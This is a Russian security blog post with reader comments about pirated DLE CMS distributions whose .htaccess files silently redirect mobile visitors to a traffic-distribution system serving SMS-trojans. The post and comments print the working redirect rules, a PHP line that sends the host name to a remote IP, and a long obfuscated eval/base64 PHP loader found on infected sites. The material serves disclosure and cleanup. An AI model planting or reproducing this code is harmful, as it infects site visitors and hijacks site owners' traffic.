Блог о безопасности

Вредоносные мобильные редиректы в дистрибутивах CMS

29 декабря 2011, 19:40

Во всех контрафактных дистрибутивах CMS DLE, опубликованных на www.softdle.com , в том числе в названных «чистыми», размещён код, выполняющий мобильный редирект на TDS www.vmaline.net . Владельцы сайтов, которые используют этот дистрибутив, полностью теряют посещения с мобильных устройств. При заходе такой сайт с мобильного устройства, у пользователя в большинстве случаев начинается загрузка вредоносного мобильного приложения, причём именно того, которое предназначено для заражения устройств этого типа.

 

Подробнее про вредоносный мобильный редирект и загружаемое вредоносное мобильное ПО

Мобильный редирект происходит из-за следующих строк в файле .htaccess :

RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "acs|alav|alca|amoi|audi|aste|avan|benq|bird|blac|blaz|brew|cell|cldc|cmd-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "dang|doco|eric|hipt|inno|ipaq|java|jigs|kddi|keji|leno|lg-c|lg-d|lg-g|lge-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|nec-|newt|noki|opwv" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|sage|sams|sany" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "teli|tim-|tosh|tsm-|upg1|upsi|vk-v|voda|w3cs|wap-|wapa|wapi" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "wapp|wapr|webc|winw|winw|xda|xda-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "up.browser|up.link|windowssce|iemobile|mini|mmp" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "symbian|midp|wap|phone|pocket|mobile|pda|psp|PPC|Android" [NC]
RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]                                            
RewriteCond %{HTTP_USER_AGENT} !america [NC]
RewriteCond %{HTTP_USER_AGENT} !avant [NC]
RewriteCond %{HTTP_USER_AGENT} !iphone [NC]
RewriteCond %{HTTP_USER_AGENT} !download [NC]
RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]
RewriteRule ^(.*)$ http://www.vmaline.net/tds/go.php?sid=17 [L,R=302]


При переходе на сайт, который использует данный заражённый дистрибутив CMS:
  • у пользователей Opera Mini для JavaME на обычных телефонах с сайта file21file.com начинается загрузка файла new_opera.jar (MD5: d2b9248d2340d349acab7199477801a6), заражённого Java.SMSSend.704, который на 29.12.2011 на virustotal.com детектирует 1 антивирус из 43;
  • у пользователей Web Browser для Symbian S60 c сайта mobiletds2.info загружается файл opera_mini_6r.jar (MD5: 1879cb916de4059481c6e727deea007e), заражённый Java.SMSSend.663, который на 29.12.2011 на virustotal.com детектируют 2 антивируса из 43;
  • у пользователей Android Browser с сайта mobiletds2.info начинает загружаться файл opera_mini_6.1.apk (MD5: c3a23174f88911591f3179c9b729f913), заражённый Android.SmsSend.253, который на 29.12.2011 на virustotal.com детектируют 11 антивирусов из 43.

 

Рекомендуем очень внимательно относиться к дистрибутивам CMS, которые получены не с официальных сайтов, и тестировать свои сайты не только с помощью обычных компьютеров, но и с помощью мобильных устройств.

19 комментариев
Подписаться на комментарии к посту

Вот тока скачал от туда Не хило впаривают

 

RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "acs|alav|alca|amoi|audi|aste|avan|benq|bird|blac|blaz|brew|cell|cldc|cmd-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "dang|doco|eric|hipt|inno|ipaq|java|jigs|kddi|keji|leno|lg-c|lg-d|lg-g|lge-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|nec-|newt|noki|opwv" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|sage|sams|sany" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "teli|tim-|tosh|tsm-|upg1|upsi|vk-v|voda|w3cs|wap-|wapa|wapi" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "wapp|wapr|webc|winw|winw|xda|xda-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "up.browser|up.link|windowssce|iemobile|mini|mmp" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "symbian|midp|wap|phone|pocket|mobile|pda|psp|PPC|Android" [NC]
RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]                                            
RewriteCond %{HTTP_USER_AGENT} !america [NC]
RewriteCond %{HTTP_USER_AGENT} !avant [NC]
RewriteCond %{HTTP_USER_AGENT} !iphone [NC]
RewriteCond %{HTTP_USER_AGENT} !download [NC]
RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]
RewriteRule ^(.*)$ http://*ww.vmaline.net/tds/go.php?sid=17 [L,R=302]

С обычного браузера перекидывает сюда _http://netkonca.ru_

 

дополнение

вся пакость с того двига


// ################ Новости за месяц #################
$rssurl = "[noleech] беслплатные фильмы через торрент ";
$rssname = "
без смс и без регистрации в хорошем качестве
[/noleech]//////////////////////////////////
$scripts = "*ttp://195.248.235.63/club2801991.php?data=dle9.4_".$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'];
/////////////////////////////////
[noleech]скачать шаблоны для dle бесплатно[/noleech]
////////////////////////////////
'add_comm' => ".com/templates/\">я",
'show_archive' => "Показать / скрыть весь архив",
'spoiler_title' => "Показать / Скрыть текст",
'reload_code' => "обновить, если не виден код",
'static_denied' => "У вас недостаточно прав для просмотра выбранной страницы.",
'att_denied' => "Вы не можете скачивать файлы с нашего сервера.",
'fav_error' => "Данный раздел доступен только зарегистрированным пользователям.",
'sec_image' => "Включите эту картинку для отображения кода безопасности.",
'news_page_err' => "К сожалению, данная страница для Вас не доступна: возможно, был изменен ее адрес или она была удалена. Пожалуйста, воспользуйтесь поиском.",
'news_regus' => "Внимание! У вас нет прав для просмотра скрытого текста.",
/////////////////////////////////



Работаю с DLE постоянно. Во всех сайтах посвящённому dle спрятанны такие "подарки"

 

Я работаю с DLE и выкладываю лицовые движки с своей лицензии и никогда не засовываю туда подарки. Не нужно обобщать одно под всех.

Я 3 года назад установил пиратский ДЛЕ и в нем сейчас есть такая гадость. Купил лицензию ДЛЕ - но версия движка другая и сайт перенести не получается. Приходится сидеть на пиратском, но с чистой совестью =) Подскажите - как удалить сам вирус? Я код чищу, чтобы редирект убрать, но вот где сидит та гадость, которая постоянно код востанавливает?

вот... неизвестно откуда....\

 

RewriteEngine on

RewriteCond %{HTTP_USER_AGENT} acs [NC,OR]

RewriteCond %{HTTP_USER_AGENT} alav [NC,OR]

RewriteCond %{HTTP_USER_AGENT} alca [NC,OR]

RewriteCond %{HTTP_USER_AGENT} amoi [NC,OR]

RewriteCond %{HTTP_USER_AGENT} audi [NC,OR]

RewriteCond %{HTTP_USER_AGENT} aste [NC,OR]

RewriteCond %{HTTP_USER_AGENT} avan [NC,OR]

RewriteCond %{HTTP_USER_AGENT} benq [NC,OR]

RewriteCond %{HTTP_USER_AGENT} bird [NC,OR]

RewriteCond %{HTTP_USER_AGENT} blac [NC,OR]

RewriteCond %{HTTP_USER_AGENT} blaz [NC,OR]

RewriteCond %{HTTP_USER_AGENT} brew [NC,OR]

RewriteCond %{HTTP_USER_AGENT} cell [NC,OR]

RewriteCond %{HTTP_USER_AGENT} cldc [NC,OR]

RewriteCond %{HTTP_USER_AGENT} cmd- [NC,OR]

RewriteCond %{HTTP_USER_AGENT} dang [NC,OR]

RewriteCond %{HTTP_USER_AGENT} doco [NC,OR]

RewriteCond %{HTTP_USER_AGENT} eric [NC,OR]

RewriteCond %{HTTP_USER_AGENT} hipt [NC,OR]

RewriteCond %{HTTP_USER_AGENT} inno [NC,OR]

RewriteCond %{HTTP_USER_AGENT} ipaq [NC,OR]

RewriteCond %{HTTP_USER_AGENT} java [NC,OR]

RewriteCond %{HTTP_USER_AGENT} jigs [NC,OR]

RewriteCond %{HTTP_USER_AGENT} kddi [NC,OR]

RewriteCond %{HTTP_USER_AGENT} keji [NC,OR]

RewriteCond %{HTTP_USER_AGENT} leno [NC,OR]

RewriteCond %{HTTP_USER_AGENT} lg-c [NC,OR]

RewriteCond %{HTTP_USER_AGENT} lg-d [NC,OR]

RewriteCond %{HTTP_USER_AGENT} lg-g [NC,OR]

RewriteCond %{HTTP_USER_AGENT} lge- [NC,OR]

RewriteCond %{HTTP_USER_AGENT} maui [NC,OR]

RewriteCond %{HTTP_USER_AGENT} maxo [NC,OR]

RewriteCond %{HTTP_USER_AGENT} midp [NC,OR]

RewriteCond %{HTTP_USER_AGENT} mits [NC,OR]

RewriteCond %{HTTP_USER_AGENT} mmef [NC,OR]

RewriteCond %{HTTP_USER_AGENT} mobi [NC,OR]

RewriteCond %{HTTP_USER_AGENT} mot- [NC,OR]

RewriteCond %{HTTP_USER_AGENT} moto [NC,OR]

RewriteCond %{HTTP_USER_AGENT} mwbp [NC,OR]

RewriteCond %{HTTP_USER_AGENT} nec- [NC,OR]

RewriteCond %{HTTP_USER_AGENT} newt [NC,OR]

RewriteCond %{HTTP_USER_AGENT} noki [NC,OR]

RewriteCond %{HTTP_USER_AGENT} opwv [NC,OR]

RewriteCond %{HTTP_USER_AGENT} palm [NC,OR]

RewriteCond %{HTTP_USER_AGENT} pana [NC,OR]

RewriteCond %{HTTP_USER_AGENT} pant [NC,OR]

RewriteCond %{HTTP_USER_AGENT} pdxg [NC,OR]

RewriteCond %{HTTP_USER_AGENT} phil [NC,OR]

RewriteCond %{HTTP_USER_AGENT} play [NC,OR]

RewriteCond %{HTTP_USER_AGENT} pluc [NC,OR]

RewriteCond %{HTTP_USER_AGENT} port [NC,OR]

RewriteCond %{HTTP_USER_AGENT} prox [NC,OR]

RewriteCond %{HTTP_USER_AGENT} qtek [NC,OR]

RewriteCond %{HTTP_USER_AGENT} qwap [NC,OR]

RewriteCond %{HTTP_USER_AGENT} sage [NC,OR]

RewriteCond %{HTTP_USER_AGENT} sams [NC,OR]

RewriteCond %{HTTP_USER_AGENT} sany [NC,OR]

RewriteCond %{HTTP_USER_AGENT} sch- [NC,OR]

RewriteCond %{HTTP_USER_AGENT} sec- [NC,OR]

RewriteCond %{HTTP_USER_AGENT} send [NC,OR]

RewriteCond %{HTTP_USER_AGENT} seri [NC,OR]

RewriteCond %{HTTP_USER_AGENT} sgh- [NC,OR]

RewriteCond %{HTTP_USER_AGENT} shar [NC,OR]

RewriteCond %{HTTP_USER_AGENT} sie- [NC,OR]

RewriteCond %{HTTP_USER_AGENT} siem [NC,OR]

RewriteCond %{HTTP_USER_AGENT} smal [NC,OR]

RewriteCond %{HTTP_USER_AGENT} smar [NC,OR]

RewriteCond %{HTTP_USER_AGENT} sony [NC,OR]

RewriteCond %{HTTP_USER_AGENT} sph- [NC,OR]

RewriteCond %{HTTP_USER_AGENT} symb [NC,OR]

RewriteCond %{HTTP_USER_AGENT} t-mo [NC,OR]

RewriteCond %{HTTP_USER_AGENT} teli [NC,OR]

RewriteCond %{HTTP_USER_AGENT} tim- [NC,OR]

RewriteCond %{HTTP_USER_AGENT} tosh [NC,OR]

RewriteCond %{HTTP_USER_AGENT} tsm- [NC,OR]

RewriteCond %{HTTP_USER_AGENT} upg1 [NC,OR]

RewriteCond %{HTTP_USER_AGENT} upsi [NC,OR]

RewriteCond %{HTTP_USER_AGENT} vk-v [NC,OR]

RewriteCond %{HTTP_USER_AGENT} voda [NC,OR]

RewriteCond %{HTTP_USER_AGENT} w3cs [NC,OR]

RewriteCond %{HTTP_USER_AGENT} wap- [NC,OR]

RewriteCond %{HTTP_USER_AGENT} wapa [NC,OR]

RewriteCond %{HTTP_USER_AGENT} wapi [NC,OR]

RewriteCond %{HTTP_USER_AGENT} wapp [NC,OR]

RewriteCond %{HTTP_USER_AGENT} wapr [NC,OR]

RewriteCond %{HTTP_USER_AGENT} webc [NC,OR]

RewriteCond %{HTTP_USER_AGENT} winw [NC,OR]

RewriteCond %{HTTP_USER_AGENT} winw [NC,OR]

RewriteCond %{HTTP_USER_AGENT} xda [NC,OR]

RewriteCond %{HTTP_USER_AGENT} xda- [NC,OR]

RewriteCond %{HTTP_USER_AGENT} up.browser [NC,OR]

RewriteCond %{HTTP_USER_AGENT} up.link [NC,OR]

RewriteCond %{HTTP_USER_AGENT} windows.ce [NC,OR]

RewriteCond %{HTTP_USER_AGENT} iemobile [NC,OR]

RewriteCond %{HTTP_USER_AGENT} mini [NC,OR]

RewriteCond %{HTTP_USER_AGENT} mmp [NC,OR]

RewriteCond %{HTTP_USER_AGENT} symbian [NC,OR]

RewriteCond %{HTTP_USER_AGENT} midp [NC,OR]

RewriteCond %{HTTP_USER_AGENT} wap [NC,OR]

RewriteCond %{HTTP_USER_AGENT} phone [NC,OR]

RewriteCond %{HTTP_USER_AGENT} pocket [NC,OR]

RewriteCond %{HTTP_USER_AGENT} mobile [NC,OR]

RewriteCond %{HTTP_USER_AGENT} android [NC,OR]

RewriteCond %{HTTP_USER_AGENT} Android [NC,OR]

RewriteCond %{HTTP_USER_AGENT} pda [NC,OR]

RewriteCond %{HTTP_USER_AGENT} PPC [NC,OR]

RewriteCond %{HTTP_USER_AGENT} Series60 [NC,OR]

RewriteCond %{HTTP_USER_AGENT} Opera.Mini [NC,OR]

RewriteCond %{HTTP_USER_AGENT} ipad [NC,OR]

RewriteCond %{HTTP_USER_AGENT} iphone [NC,OR]

RewriteCond %{HTTP_USER_AGENT} iPad [NC,OR]

RewriteCond %{HTTP_USER_AGENT} iPhone [NC,OR]

RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR]

RewriteCond %{HTTP_USER_AGENT} !windows.nt [NC]

RewriteCond %{HTTP_USER_AGENT} !bsd [NC]

RewriteCond %{HTTP_USER_AGENT} !x11 [NC]

RewriteCond %{HTTP_USER_AGENT} !unix [NC]

RewriteCond %{HTTP_USER_AGENT} !macos [NC]

RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]

RewriteCond %{HTTP_USER_AGENT} !playstation [NC]

RewriteCond %{HTTP_USER_AGENT} !google [NC]

RewriteCond %{HTTP_USER_AGENT} !yandex [NC]

RewriteCond %{HTTP_USER_AGENT} !bot [NC]

RewriteCond %{HTTP_USER_AGENT} !libwww [NC]

RewriteCond %{HTTP_USER_AGENT} !msn [NC]

RewriteCond %{HTTP_USER_AGENT} !america [NC]

RewriteCond %{HTTP_USER_AGENT} !avant [NC]

RewriteCond %{HTTP_USER_AGENT} !download [NC]

RewriteCond %{HTTP_USER_AGENT} !fdm [NC]

RewriteCond %{HTTP_USER_AGENT} !maui [NC]

RewriteCond %{HTTP_USER_AGENT} !webmoney [NC]

RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]

 

RewriteRule ^(.*)$ http://downloadbox.pp.ua/bartalamio/go.php?sid=1 [L,R=302]

Время безопасных телефонов опять возвращается: http://vmaske.ru/uploads/images/d/8/d/6/2/b208a94223.jpg (телефон-кастет), а что я бы купил телефончик в виде оружия :)

Есть новый сервис http://www.virusdie.ru который умеет проверять и лечить редирект с мобильных устройств. А также он проверяет и лечит другие редиректы бесплатно.

Ищет очень плохо, у меня на сайт http://kurs22.spb.ru стоит вирус редирект на сайт 39mobi.com.

Целый день ищу где он может быть не могу найти =( Может кто знает где искать этот редирект?

Забыл указать, редирект идет только тогда когда захожу с мобильногол

Нашел все таки, эту гадость в шаблоне SmartPhone, в файле main.tpl. Может кому-то пригодиться:

 

спасибо)

Вирусдай — облачный антивирус для сайтов.

Сервис www.virusdie.ru перешел из стадии прототипа в открытую альфа-версию. Он сканирует и лечит сайты.

Можно как и раньше сканировать и лечить сайты «пачками». Как и раньше он не требует установки, находит и удаляет редиректы с поисковых систем и мобильных устройств, дефейсы, шелы, бэкдоры и вредоносные коды, а также, выполняет большое число других функций.

Зарегистрировался на этом сервисе, но он ничего не нашел, хотя yandex определяет на моем сайте мобильный редирект. Вот отрывок с последнего тикета:

При последней проверке Вашего сайта наши алгоритмы обнаружили код, автоматически перенаправляющий посетителей на следующий вредоносный ресурс: mobyz.net при посещении сайта с мобильных устройств.

 

Причем, когда мой сай пометили я проверил его зайдя с планшета, и с мобильного, никакого редиректа на другие сайты не происходило.

поиск в mysql ничего не дал. Модифицированныйх файлов тоже не нашел.

На мою просюбу указать зараженный файл или лог, в том же тикете был такой ответ:

Обращаю Ваше внимание, что источник заражения находится на серверной стороне, а не на страницах сайта, для которых наблюдается редирект, поэтому я не могу указать на конкретный зараженный файл.

Возможно, на Вирусдае просто еще нет такой сигнатуры.

Посмотрите файл .htaccess в корне вашего сайта. Возможно, именно там редирект и сидит и
почти наверняка в правиле RewriteEngine On прописано правило переадресации на ресурс mobyz.net.

Если же это не так, то редирект сидит в PHP скрипте в каком-либо (любом) файле сайта и найти его можно знаю его сигнатуру, которой нет.
Мы попробуем сделать поиск на входждение mobyz.net в ваших файлах, если ваш сайт синхронизован с Вирусдаем.

У меня вот что нашлось:
66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64');$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};$OOO000O00=$OOO000000{0}.$OOO000000{12}.$OOO000000{7}.$OOO000000{5}.$OOO000000{15};$O0O000O00=$OOO000000{0}.$OOO000000{1}.$OOO000000{5}.$OOO000000{14};$O0O000O0O=$O0O000O00.$OOO000000{11};$O0O000O00=$O0O000O00.$OOO000000{3};$O0O00OO00=$OOO000000{0}.$OOO000000{8}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};$OOO00000O=$OOO000000{3}.$OOO000000{14}.$OOO000000{8}.$OOO000000{14}.$OOO000000{8};$OOO0O0O00=__FILE__;$OO00O0000=0x39cc;eval($OOO0000O0('JE8wMDBPME8wMD0kT09PMDAwTzAwKCRPT08wTzBPMDAsJ3JiJyk7JE8wTzAwT08wMCgkTzAwME8wTzAwLDB4NTBlKTskT08wME8wME8wPSRPT08wMDAwTzAoJE9PTzAwMDAwTygkTzBPMDBPTzAwKCRPMDAwTzBPMDAsMHgxN2MpLCdmMHBCNXRvWFUxRFJ2aTlhTmNsaEpkVFNLR3orMkl5Q1luTFBGL1dFN21xd1F4ajh1NE1aczZIQWtyZ1ZiM09lPScsJ0FCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXowMTIzNDU2Nzg5Ky8nKSk7ZXZhbCgkT08wME8wME8wKTs='));return;?>~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